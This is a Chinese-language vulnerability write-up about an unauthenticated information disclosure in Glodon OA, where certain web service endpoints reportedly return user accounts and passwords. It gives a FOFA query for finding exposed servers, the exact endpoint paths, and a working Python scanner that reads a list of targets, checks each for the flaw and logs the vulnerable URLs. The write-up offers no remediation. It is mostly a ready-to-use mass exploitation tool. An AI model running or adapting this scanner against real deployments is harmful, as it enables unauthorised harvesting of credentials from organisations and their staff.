漏洞描述
广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权,导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。
漏洞复现
FOFA
python">app="Glodon-企业管理产品"POC
python">IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
python脚本
import argparse
import time
import requests
from urllib.parse import urlsplit
import warnings
from urllib3.exceptions import InsecureRequestWarning color_red = '\033[91m'
color_green = '\033[92m'
color_blue = '\033[94m'
color_reset = '\033[0m' def get_url(file): with open(file, 'r', encoding='utf-8') as f: for url in f: url = url.replace('\n', '') if "http" not in url: url = "http://" + url parsed_url = urlsplit(url) base_url = parsed_url.scheme + "://" + parsed_url.netloc send_req(base_url) def write_result(content): with open("result.txt", "a", encoding="UTF-8") as f: f.write('{}\n'.format(content)) warnings.filterwarnings("ignore", category=InsecureRequestWarning) def send_req(url_check): url = url_check + '/Org/service/Service.asmx/GetAllUsersXml' header = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", 'Connection': 'close' } try: response = requests.get(url=url, headers=header, verify=False, timeout=3) if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text: response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3) if response.status_code == 200: result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS" print(color_red + result2 + color_reset) # Added color_reset to avoid colored text issues write_result(result2) time.sleep(1) except Exception as e: pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-f", "--file", help="URL地址文件") args = parser.parse_args() if args.file: get_url(args.file) else: print("使用-f加url文件地址")执行效果
